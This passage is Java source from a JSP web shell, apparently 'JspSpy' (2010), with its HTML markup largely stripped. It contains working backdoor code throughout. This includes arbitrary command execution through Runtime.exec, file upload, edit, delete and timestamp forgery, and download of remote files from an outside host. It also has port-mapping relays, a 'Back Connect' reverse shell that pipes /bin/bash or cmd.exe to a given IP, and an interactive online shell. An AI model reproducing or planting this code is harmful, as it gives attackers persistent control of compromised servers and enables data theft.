0"+f.getName()+""+Util.formatDate(f.lastModified())+"--"+f.canRead()+" / "+f.canWrite()+" / unknow"); if (enter != null) out.println(" "); else out.println("Del | Move | Pack"); out.println("
"+f.getName()+""+Util.formatDate(f.lastModified())+""+Util.getSize(f.length(),'B')+""+ ""+f.canRead()+" / "+f.canWrite()+" / unknow "+ "Edit | "+ "Down | "+ "Copy"); if (enter == null ) { out.println(" | Move | "+ "Property | "+ "Enter"); if (f.getName().endsWith(".zip") || f.getName().endsWith(".jar")) { out.println(" | UnPack"); } else if (f.getName().endsWith(".rar")) { out.println(" | UnPack"); } else { out.println(" | Pack"); } } out.println("
 "); if (enter != null) out.println("Pack Selected - Delete Selected"); else out.println("Pack Selected - Delete Selected"); out.println(""+dircount+" directories / "+filecount+" files
"); out.println("
"); if (file instanceof EnterFile) ((EnterFile)file).close(); } catch (ZipException e) { JSession.setAttribute(MSG,"\""+JSession.getAttribute(ENTER).toString()+"\" Is Not a Zip File. Please Exit."); throw e; } catch (Exception e) { JSession.setAttribute(MSG,"File Does Not Exist Or You Dont Have Privilege."+BACK_HREF); throw e; } } } private static class LogoutInvoker extends DefaultInvoker { public boolean doBefore() {return false;} public boolean doAfter() {return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { Object dbo = JSession.getAttribute(DBO); if (dbo != null) ((DBOperator)dbo).close(); Object obj = JSession.getAttribute(PORT_MAP); if (obj != null) { ServerSocket s = (ServerSocket)obj; s.close(); } Object online = JSession.getAttribute(SHELL_ONLINE); if (online != null) ((OnLineProcess)online).stop(); JSession.invalidate(); ((Invoker)ins.get("vLogin")).invoke(request,response,JSession); } catch (ClassCastException e) { JSession.invalidate(); ((Invoker)ins.get("vLogin")).invoke(request,response,JSession); } catch (Exception e) { throw e ; } } } private static class UploadInvoker extends DefaultInvoker { public boolean doBefore() {return false;} public boolean doAfter() {return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { UploadBean fileBean = new UploadBean(); response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString()); fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString()); fileBean.parseRequest(request); File f = new File(JSession.getAttribute(CURRENT_DIR)+"/"+fileBean.getFileName()); if (f.exists() && f.length() > 0) JSession.setAttribute(MSG,"Upload File Success!"); else JSession.setAttribute("MSG","Upload File Failed!"); response.sendRedirect(SHELL_NAME); } catch (Exception e) { throw e ; } } } private static class CopyInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { String src = request.getParameter("src"); String to = request.getParameter("to"); InputStream in = null; Object enter = JSession.getAttribute(ENTER); if (enter == null) in = new FileInputStream(new File(src)); else { ZipFile zf = new ZipFile((String)enter); ZipEntry entry = zf.getEntry(src); in = zf.getInputStream(entry); } BufferedInputStream input = new BufferedInputStream(in); BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to))); byte[] d = new byte[1024]; int len = input.read(d); while(len != -1) { output.write(d,0,len); len = input.read(d); } output.close(); input.close(); JSession.setAttribute(MSG,"Copy File Success!"); response.sendRedirect(SHELL_NAME); } catch (Exception e) { throw e ; } } } private static class BottomInvoker extends DefaultInvoker { public boolean doBefore() {return false;} public boolean doAfter() {return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { response.getWriter().println("
Copyright (C) 2010 http://www.Forjj.com/  [T00ls.Net] All Rights Reserved."+ "
"); } catch (Exception e) { throw e ; } } } private static class VCreateFileInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); String path = request.getParameter("filepath"); File f = new File(path); if (!f.isAbsolute()) { String oldPath = path; path = JSession.getAttribute(CURRENT_DIR).toString(); if (!path.endsWith("/")) path+="/"; path+=oldPath; f = new File(path); f.createNewFile(); } else { f.createNewFile(); } out.println("
"+ "
"+ "

Create / Edit File »

"+ ""+ "

Current File (import new file name and new file)
"+ "

"+ "

File Content

"+ "

"+ "
"+ "
"); } catch (Exception e) { throw e ; } } } private static class VEditInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); String path = request.getParameter("filepath"); String charset = request.getParameter("charset"); Object enter = JSession.getAttribute(ENTER); InputStream input = null; if (enter != null) { ZipFile zf = new ZipFile((String)enter); ZipEntry entry = new ZipEntry(path); input = zf.getInputStream(entry); } else { File f = new File(path); if (!f.exists()) return; input = new FileInputStream(path); } BufferedReader reader = null; if (Util.isEmpty(charset) || charset.equals("ANSI")) reader = new BufferedReader(new InputStreamReader(input)); else reader = new BufferedReader(new InputStreamReader(input,charset)); StringBuffer content = new StringBuffer(); String s = reader.readLine(); while (s != null) { content.append(s+"\r\n"); s = reader.readLine(); } reader.close(); out.println("
"+ "
"+ "

Create / Edit File »

"+ ""+ "

Current File (import new file name and new file)
"+ "

"+ "

File Content

"+ "

"); if (enter != null) out.println(""); else out.println(""); out.println("

"+ "
"+ "
"); } catch (Exception e) { throw e ; } } } private static class CreateFileInvoker extends DefaultInvoker { public boolean doBefore(){return false;} public boolean doAfter(){return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); String path = request.getParameter("filepath"); String content = request.getParameter("filecontent"); String charset = request.getParameter("charset"); BufferedWriter outs = null; if (charset.equals("ANSI")) outs = new BufferedWriter(new FileWriter(new File(path))); else outs = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(path)),charset)); outs.write(content,0,content.length()); outs.close(); JSession.setAttribute(MSG,"Save File "+(new File(path)).getName()+" With "+charset+" Success!"); response.sendRedirect(SHELL_NAME); } catch (Exception e) { throw e ; } } } private static class VEditPropertyInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); String filepath = request.getParameter("filepath"); File f = new File(filepath); if (!f.exists()) return; String read = f.canRead() ? "checked=\"checked\"" : ""; String write = f.canWrite() ? "checked=\"checked\"" : ""; Calendar cal = Calendar.getInstance(); cal.setTimeInMillis(f.lastModified()); out.println("
"+ "
"+ "

Set File Property »

"+ "

Current File (FullPath)

"+ " "+ "

"+ " Read "+ " Write "+ "

"+ "

Instead »"+ "year:"+ ""+ "month:"+ ""+ "day:"+ ""+ ""+ "hour:"+ ""+ "minute:"+ ""+ "second:"+ ""+ "

"+ "

"+ "
"+ "
"); } catch (Exception e) { throw e ; } } } private static class EditPropertyInvoker extends DefaultInvoker { public boolean doBefore(){return false;} public boolean doAfter(){return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { String f = request.getParameter("file"); File file = new File(f); if (!file.exists()) return; String year = request.getParameter("year"); String month = request.getParameter("month"); String date = request.getParameter("date"); String hour = request.getParameter("hour"); String minute = request.getParameter("minute"); String second = request.getParameter("second"); Calendar cal = Calendar.getInstance(); cal.set(Calendar.YEAR,Integer.parseInt(year)); cal.set(Calendar.MONTH,Integer.parseInt(month)-1); cal.set(Calendar.DATE,Integer.parseInt(date)); cal.set(Calendar.HOUR,Integer.parseInt(hour)); cal.set(Calendar.MINUTE,Integer.parseInt(minute)); cal.set(Calendar.SECOND,Integer.parseInt(second)); if(file.setLastModified(cal.getTimeInMillis())){ JSession.setAttribute(MSG,"Reset File Property Success!"); } else { JSession.setAttribute(MSG,"Reset File Property Failed!"); } response.sendRedirect(SHELL_NAME); } catch (Exception e) { throw e ; } } } //VShell private static class VsInvoker extends DefaultInvoker{ public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); String cmd = request.getParameter("command"); String program = request.getParameter("program"); if (cmd == null) { if (ISLINUX) cmd = "id"; else cmd = "cmd.exe /c set"; } if (program == null) program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt"; if (JSession.getAttribute(MSG)!=null) { Util.outMsg(out,JSession.getAttribute(MSG).toString()); JSession.removeAttribute(MSG); } out.println(""+ "
"+ "
"+ "

Execute Program »

"+ "

"+ ""+ ""+ "Parameter
"+ ""+ "

"+ "
"+ "
"+ "

Execute Shell »

"+ "

"+ ""+ ""+ "Parameter
"+ ""+ "

"+ "
"+ "
"); } catch (Exception e) { throw e ; } } } private static class ShellInvoker extends DefaultInvoker{ public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); String type = request.getParameter("type"); if (type.equals("command")) { ((Invoker)ins.get("vs")).invoke(request,response,JSession); out.println("

"); out.println("
");
String command = request.getParameter("command");
if (!Util.isEmpty(command)) {
Process pro = Runtime.getRuntime().exec(command);
BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
String s = reader.readLine();
while (s != null) {
out.println(Util.htmlEncode(Util.getStr(s)));
s = reader.readLine();
}
reader.close();
reader = new BufferedReader(new InputStreamReader(pro.getErrorStream()));
s = reader.readLine();
while (s != null) {
out.println(Util.htmlEncode(Util.getStr(s)));
s = reader.readLine();
}
reader.close();
out.println("
"); } } else { String program = request.getParameter("program"); if (!Util.isEmpty(program)) { Process pro = Runtime.getRuntime().exec(program); JSession.setAttribute(MSG,"Program Has Run Success!"); ((Invoker)ins.get("vs")).invoke(request,response,JSession); } } } catch (Exception e) { throw e ; } } } private static class DownInvoker extends DefaultInvoker{ public boolean doBefore(){return false;} public boolean doAfter(){return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { String path = request.getParameter("path"); if (Util.isEmpty(path)) return; InputStream i = null; Object enter = JSession.getAttribute(ENTER); String fileName = null; if (enter == null) { File f = new File(path); if (!f.exists()) return; fileName = f.getName(); i = new FileInputStream(f); } else { ZipFile zf = new ZipFile((String)enter); ZipEntry entry = new ZipEntry(path); fileName = entry.getName().substring(entry.getName().lastIndexOf("/") + 1); i = zf.getInputStream(entry); } response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(fileName,PAGE_CHARSET)); BufferedInputStream input = new BufferedInputStream(i); BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream()); byte[] data = new byte[1024]; int len = input.read(data); while (len != -1) { output.write(data,0,len); len = input.read(data); } input.close(); output.close(); } catch (Exception e) { throw e ; } } } //VDown private static class VdInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); String savepath = request.getParameter("savepath"); String url = request.getParameter("url"); if (Util.isEmpty(url)) url = "http://www.forjj.com/"; if (Util.isEmpty(savepath)) { savepath = JSession.getAttribute(CURRENT_DIR).toString(); } if (!Util.isEmpty(JSession.getAttribute("done"))) { Util.outMsg(out,"Download Remote File Success!"); JSession.removeAttribute("done"); } out.println("
"+ "
"+ "

Remote File DownLoad »

"+ "

"+ ""+ "

File   URL: "+ "

"+ "

Save Path: "+ "

"+ ""+ "

"+ "
"); } catch (Exception e) { throw e ; } } } private static class DownRemoteInvoker extends DefaultInvoker { public boolean doBefore(){return true;} public boolean doAfter(){return true;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { String downFileUrl = request.getParameter("url"); String savePath = request.getParameter("savepath"); if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) return; URL downUrl = new URL(downFileUrl); URLConnection conn = downUrl.openConnection(); File tempF = new File(savePath); File saveF = tempF; if (tempF.isDirectory()) { String fName = downFileUrl.substring(downFileUrl.lastIndexOf("/")+1); saveF = new File(tempF,fName); } BufferedInputStream in = new BufferedInputStream(conn.getInputStream()); BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(saveF)); byte[] data = new byte[1024]; int len = in.read(data); while (len != -1) { out.write(data,0,len); len = in.read(data); } in.close(); out.close(); JSession.setAttribute("done","d"); ((Invoker)ins.get("vd")).invoke(request,response,JSession); } catch (Exception e) { throw e ; } } } private static class IndexInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { ((Invoker)ins.get("filelist")).invoke(request,response,JSession); } catch (Exception e) { throw e ; } } } private static class MkDirInvoker extends DefaultInvoker { public boolean doBefore(){return false;} public boolean doAfter(){return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { String name = request.getParameter("name"); File f = new File(name); if (!f.isAbsolute()) { String path = JSession.getAttribute(CURRENT_DIR).toString(); if (!path.endsWith("/")) path += "/"; path += name; f = new File(path); } f.mkdirs(); JSession.setAttribute(MSG,"Make Directory Success!"); response.sendRedirect(SHELL_NAME); } catch (Exception e) { throw e ; } } } private static class MoveInvoker extends DefaultInvoker { public boolean doBefore(){return false;} public boolean doAfter(){return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); String src = request.getParameter("src"); String target = request.getParameter("to"); if (!Util.isEmpty(target) && !Util.isEmpty(src)) { File file = new File(src); if(file.renameTo(new File(target))) { JSession.setAttribute(MSG,"Move File Success!"); } else { String msg = "Move File Failed!"; if (file.isDirectory()) { msg += "The Move Will Failed When The Directory Is Not Empty."; } JSession.setAttribute(MSG,msg); } response.sendRedirect(SHELL_NAME); } } catch (Exception e) { throw e ; } } } private static class RemoveDirInvoker extends DefaultInvoker { public boolean doBefore(){return false;} public boolean doAfter(){return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { String dir = request.getParameter("dir"); File file = new File(dir); if (file.exists()) { deleteFile(file); deleteDir(file); } JSession.setAttribute(MSG,"Remove Directory Success!"); response.sendRedirect(SHELL_NAME); } catch (Exception e) { throw e ; } } public void deleteFile(File f) { if (f.isFile()) { f.delete(); }else { File[] list = f.listFiles(); for (int i = 0;i"+ ""+ ""+ ""+ " "+ " "+ " "+ "

Pack Configuration >>

"+ "
"+ " "+ " "+ " "+ " "+ " "+ " "+ " "+ " "+ "
"+ " "+ " "+ " "+ " "+ " "+ " "+ " "+ " "+ " "+ " "+ " "+ " "+ " "+ " "+ " "+ " "+ " "+ " "+ " "+ "
Packed Dir
Save To
Ext Filter"+ " no Blacklist Whitelist"+ "
"+ "
Filesize Filter(KB) "+ " no greaterthanlessthan
Exclude Dir
"+ " "+ "
"+ "
" ); } catch (Exception e) { throw e; } } } private static class PackInvoker extends DefaultInvoker { public boolean doBefore(){return false;} public boolean doAfter(){return false;} private boolean config = false; private String extFilter = "blacklist"; private String[] fileExts = null; private String sizeFilter = "no"; private int filesize = 0; private String[] exclude = null; private String packFile = null; private void reset(){ this.config = false; this.extFilter = "blacklist"; this.fileExts = null; this.sizeFilter = "no"; this.filesize = 0; this.exclude = null; this.packFile = null; } public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { String config = request.getParameter("config"); if (!Util.isEmpty(config) && config.equals("true")) { this.config = true; this.extFilter = request.getParameter("extfilter"); this.fileExts = request.getParameter("fileext").split(","); this.sizeFilter = request.getParameter("sizefilter"); this.filesize = Integer.parseInt(request.getParameter("filesize")); this.exclude = request.getParameter("exclude").split(","); } String packedFile = request.getParameter("packedfile"); if (Util.isEmpty(packedFile)) return; this.packFile = packedFile; String saveFileName = request.getParameter("savefilename"); File saveF = null; if (this.config) saveF = new File(saveFileName); else saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); if (saveF.exists()) { JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); response.sendRedirect(SHELL_NAME); return; } File pF = new File(packedFile); ZipOutputStream zout = null; String base = ""; if (pF.isDirectory()) { if (pF.listFiles().length == 0) { JSession.setAttribute(MSG,"No File To Pack ! Maybe The Directory Is Empty ."); response.sendRedirect(SHELL_NAME); this.reset(); return; } zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); zipDir(pF,base,zout); } else { zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); zipFile(pF,base,zout); } zout.close(); this.reset(); JSession.setAttribute(MSG,"Pack File Success!"); response.sendRedirect(SHELL_NAME); } catch (Exception e) { throw e; } } public void zipDir(File f,String base,ZipOutputStream zout) throws Exception { if (f.isDirectory()) { if (this.config) { String curName = f.getAbsolutePath().replace('\\','/'); curName = curName.replaceAll("\\Q"+this.packFile+"\\E",""); if (this.exclude != null) { for (int i = 0;i filesize) return; } } } ZipEntry entry = new ZipEntry(base+f.getName()); zout.putNextEntry(entry); FileInputStream fInput = new FileInputStream(f); int len = 0; byte[] buf = new byte[1024]; while ((len = fInput.read(buf)) != -1) { zout.write(buf, 0, len); zout.flush(); } fInput.close(); } } private static class UnPackInvoker extends DefaultInvoker { public boolean doBefore(){return false;} public boolean doAfter(){return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { String savepath = request.getParameter("savepath"); String zipfile = request.getParameter("zipfile"); if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) return; File save = new File(savepath); save.mkdirs(); ZipFile file = new ZipFile(new File(zipfile)); Enumeration e = file.entries(); while (e.hasMoreElements()) { ZipEntry en = (ZipEntry) e.nextElement(); String entryPath = en.getName(); int index = entryPath.lastIndexOf("/"); if (index != -1) entryPath = entryPath.substring(0,index); File absEntryFile = new File(save,entryPath); if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) absEntryFile.mkdirs(); BufferedOutputStream output = null; BufferedInputStream input = null; try { output = new BufferedOutputStream( new FileOutputStream(new File(save,en.getName()))); input = new BufferedInputStream( file.getInputStream(en)); byte[] b = new byte[1024]; int len = input.read(b); while (len != -1) { output.write(b, 0, len); len = input.read(b); } } catch (Exception ex) { } finally { try { if (output != null) output.close(); if (input != null) input.close(); } catch (Exception ex1) { } } } file.close(); JSession.setAttribute(MSG,"UnPack File Success!"); response.sendRedirect(SHELL_NAME); } catch (Exception e) { throw e ; } } } //VMapPort private static class VmpInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); Object localIP = JSession.getAttribute("localIP"); Object localPort = JSession.getAttribute("localPort"); Object remoteIP = JSession.getAttribute("remoteIP"); Object remotePort = JSession.getAttribute("remotePort"); Object done = JSession.getAttribute("done"); JSession.removeAttribute("localIP"); JSession.removeAttribute("localPort"); JSession.removeAttribute("remoteIP"); JSession.removeAttribute("remotePort"); JSession.removeAttribute("done"); if (Util.isEmpty(localIP)) localIP = InetAddress.getLocalHost().getHostAddress(); if (Util.isEmpty(localPort)) localPort = "3389"; if (Util.isEmpty(remoteIP)) remoteIP = "www.forjj.com"; if (Util.isEmpty(remotePort)) remotePort = "80"; if (!Util.isEmpty(done)) Util.outMsg(out,done.toString()); out.println("
"+ ""+ " "+ " "+ " "+ ""+ "

PortMap >>

"+ "
"+ " "+ " "+ " "+ " "+ " "+ " "+ " "+ " "+ " "+ " "+ " "+ "

Local Ip :"+ " "+ "
Local Port :"+ " Remote Ip :"+ " Remote Port :"+ "

"+ " "+ " "+ "
"+ "
"+ "
"+ "
"); String targetIP = request.getParameter("targetIP"); String targetPort = request.getParameter("targetPort"); String yourIP = request.getParameter("yourIP"); String yourPort = request.getParameter("yourPort"); if (Util.isEmpty(targetIP)) targetIP = "127.0.0.1"; if (Util.isEmpty(targetPort)) targetPort = "3389"; if (Util.isEmpty(yourIP)) yourIP = request.getRemoteAddr(); if (Util.isEmpty(yourPort)) yourPort = "53"; out.println("
"+ ""+ " "+ " "+ " "+ ""+ "

Port Back >>

"+ "
"+ " "+ " "+ " "+ " "+ " "+ " "+ " "+ " "+ " "+ " "+ " "+ "

Target Ip :"+ " "+ "
Target Port :"+ " Your Ip :"+ " Your Port :"+ "

"+ " "+ "
"+ "
"+ "
"+ "
"); } catch (Exception e) { throw e ; } } } //StopMapPort private static class SmpInvoker extends DefaultInvoker { public boolean doAfter(){return true;} public boolean doBefore(){return true;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { Object obj = JSession.getAttribute(PORT_MAP); if (obj != null) { ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP); server.close(); } JSession.setAttribute("done","Stop Success!"); ((Invoker)ins.get("vmp")).invoke(request,response,JSession); } catch (Exception e) { throw e ; } } } //PortBack private static class PortBackInvoker extends DefaultInvoker { public boolean doAfter(){return true;} public boolean doBefore(){return true;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { String targetIP = request.getParameter("targetIP"); String targetPort = request.getParameter("targetPort"); String yourIP = request.getParameter("yourIP"); String yourPort = request.getParameter("yourPort"); Socket yourS = new Socket(); yourS.connect(new InetSocketAddress(yourIP,Integer.parseInt(yourPort))); Socket targetS = new Socket(); targetS.connect(new InetSocketAddress(targetIP,Integer.parseInt(targetPort))); StreamConnector.readFromLocal(new DataInputStream(targetS.getInputStream()),new DataOutputStream(yourS.getOutputStream())); StreamConnector.readFromRemote(targetS,yourS,new DataInputStream(yourS.getInputStream()),new DataOutputStream(targetS.getOutputStream())); JSession.setAttribute("done","Port Back Success !"); ((Invoker)ins.get("vmp")).invoke(request,response,JSession); } catch (Exception e) { throw e ; } } } private static class MapPortInvoker extends DefaultInvoker { public boolean doBefore(){return false;} public boolean doAfter(){return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); String localIP = request.getParameter("localIP"); String localPort = request.getParameter("localPort"); final String remoteIP = request.getParameter("remoteIP"); final String remotePort = request.getParameter("remotePort"); if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) return; Object obj = JSession.getAttribute(PORT_MAP); if (obj != null) { ServerSocket s = (ServerSocket)obj; s.close(); } final ServerSocket server = new ServerSocket(); server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort))); JSession.setAttribute(PORT_MAP,server); new Thread(new Runnable(){ public void run(){ while (true) { Socket soc = null; Socket remoteSoc = null; DataInputStream remoteIn = null; DataOutputStream remoteOut = null; DataInputStream localIn = null; DataOutputStream localOut = null; try{ soc = server.accept(); remoteSoc = new Socket(); remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort))); remoteIn = new DataInputStream(remoteSoc.getInputStream()); remoteOut = new DataOutputStream(remoteSoc.getOutputStream()); localIn = new DataInputStream(soc.getInputStream()); localOut = new DataOutputStream(soc.getOutputStream()); StreamConnector.readFromLocal(localIn,remoteOut); StreamConnector.readFromRemote(soc,remoteSoc,remoteIn,localOut); }catch(Exception ex) { break; } } } }).start(); JSession.setAttribute("done","Map Port Success!"); JSession.setAttribute("localIP",localIP); JSession.setAttribute("localPort",localPort); JSession.setAttribute("remoteIP",remoteIP); JSession.setAttribute("remotePort",remotePort); JSession.setAttribute(SESSION_O,"vmp"); response.sendRedirect(SHELL_NAME); } catch (Exception e) { throw e ; } } } //VBackConnect private static class VbcInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); Object ip = JSession.getAttribute("ip"); Object port = JSession.getAttribute("port"); Object program = JSession.getAttribute("program"); Object done = JSession.getAttribute("done"); JSession.removeAttribute("ip"); JSession.removeAttribute("port"); JSession.removeAttribute("program"); JSession.removeAttribute("done"); if (Util.isEmpty(ip)) ip = request.getRemoteAddr(); if (Util.isEmpty(port) || !Util.isInteger(port.toString())) port = "53"; if (Util.isEmpty(program)) { if (ISLINUX) program = "/bin/bash"; else program = "cmd.exe"; } if (!Util.isEmpty(done)) Util.outMsg(out,done.toString()); out.println("
"+ ""+ " "+ " "+ " "+ ""+ "

Back Connect >>

"+ "
"+ " "+ " "+ " "+ " "+ " "+ " "+ " "+ " "+ "
Your Ip :"+ " "+ " Your Port :"+ " Program To Back :"+ "

"+ " "+ "
"+ "
"+ "
"+ "
"); } catch (Exception e) { throw e ; } } } private static class BackConnectInvoker extends DefaultInvoker { public boolean doAfter(){return false;} public boolean doBefore(){return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { String ip = request.getParameter("ip"); String port = request.getParameter("port"); String program = request.getParameter("program"); if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port)) return; Socket socket = new Socket(ip,Integer.parseInt(port)); Process process = Runtime.getRuntime().exec(program); (new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); (new StreamConnector(process.getErrorStream(), socket.getOutputStream())).start(); (new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); JSession.setAttribute("done","Back Connect Success!"); JSession.setAttribute("ip",ip); JSession.setAttribute("port",port); JSession.setAttribute("program",program); JSession.setAttribute(SESSION_O,"vbc"); response.sendRedirect(SHELL_NAME); } catch (Exception e) { throw e ; } } } private static class JspEnvInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); out.println(""+ " "+ " "+ " "+ "

System Properties >>

"+ "
"+ "
"+ "
    "); Properties pro = System.getProperties(); Enumeration names = pro.propertyNames(); while (names.hasMoreElements()){ String name = (String)names.nextElement(); out.println("
  • "+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+"
  • "); } out.println("

System Environment >>


    "); /* Map envs = System.getenv(); Set> entrySet = envs.entrySet(); for (Map.Entry en:entrySet) { out.println("
  • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
  • "); }*/ out.println("
"); } catch (Exception e) { throw e ; } } } private static class ReflectInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); String c = request.getParameter("Class"); Class cls = null; try { if (!Util.isEmpty(c)) cls = Class.forName(c); } catch (ClassNotFoundException ex) { Util.outMsg(out,"Class "+c+" Not Found ! "); } out.println("
"+ " "+ " "+ " "+ " "+ " "+ "

Java Reflect >>

"+ " "+ " "+ " "+ " "+ " "+ "
Class Name : "+ "
"+ "
"+ "
"); if (cls != null) { StringBuffer sb = new StringBuffer(); if (cls.getPackage() != null) sb.append("package "+cls.getPackage().getName()+";\n"); String n = null; if (cls.isInterface()) n = ""; //else if (cls.isEnum()) // n = "enum"; else n = "class"; sb.append(Modifier.toString(cls.getModifiers())+" "+n+" "+cls.getName()+"\n"); if (cls.getSuperclass() != null) sb.append("\textends "+cls.getSuperclass().getName()+"\n"); if (cls.getInterfaces() != null && cls.getInterfaces().length != 0) { Class[] faces = cls.getInterfaces(); sb.append("\t implements "); for (int i = 0;i"+faces[i].getName()+""); if (i != faces.length -1) { sb.append(","); } } } sb.append("{\n\t\n"); sb.append("\t//constructors..\n"); Constructor[] cs = cls.getConstructors(); for (int i = 0;i"); if (obj != null) sb.append(obj.toString()); else sb.append("NULL"); sb.append(""); } sb.append("\n"); } sb.append("\n\t//methods\n"); Method[] ms = cls.getDeclaredMethods(); for (int i =0;i")+""; Util.outMsg(out,m,"left"); } } catch (Exception e) { throw e; } } } private static class TopInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); out.println("
"+ ""+ " "+ " "+ " "+ " "+ " "+ "
JspSpy Ver: 2010 "+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+") | copy
Logout | "+ " File Manager | "+ " DataBase Manager | "+ " Execute Command | "+ " Shell OnLine | "+ " Back Connect | "+ " Java Reflect | "+ " "+ " Eval Java Code | "+ " Port Scan | "+ " Download Remote File | "+ " ClipBoard | "+ " Port Map | "+ " Others | "+ " JSP Env "+ "
"); if (JSession.getAttribute(MSG) != null) { Util.outMsg(out,JSession.getAttribute(MSG).toString()); JSession.removeAttribute(MSG); } if (JSession.getAttribute(ENTER_MSG) != null) { String outEntry = request.getParameter("outentry"); if (Util.isEmpty(outEntry) || !outEntry.equals("true")) Util.outMsg(out,JSession.getAttribute(ENTER_MSG).toString()); } } catch (Exception e) { throw e ; } } } private static class VOnLineShellInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { PrintWriter out = response.getWriter(); out.println(" "); out.println(""+ " "+ " "+ " "+ "
"); out.println("

Shell OnLine »


"); out.println("
"+ " "+ " "+ " Notice ! If You Are Using IE , You Must Input Some Commands First After You Start Or You Will Not See The Echo"+ "
"+ "
"+ " "+ "
"+ " "+ " "+ " "+ " Auto Scroll"+ " "+ "
"+ " " ); out.println("
"); } catch (Exception e) { throw e ; } } } private static class OnLineInvoker extends DefaultInvoker { public boolean doBefore(){return false;} public boolean doAfter(){return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { String type = request.getParameter("type"); if (Util.isEmpty(type)) return; if (type.toLowerCase().equals("start")) { String exe = request.getParameter("exe"); if (Util.isEmpty(exe)) return; Process pro = Runtime.getRuntime().exec(exe); ByteArrayOutputStream outs = new ByteArrayOutputStream(); response.setContentLength(100000000); response.setContentType("text/html;charset="+System.getProperty("file.encoding")); OnLineProcess olp = new OnLineProcess(pro); JSession.setAttribute(SHELL_ONLINE,olp); new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start(); new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start(); new 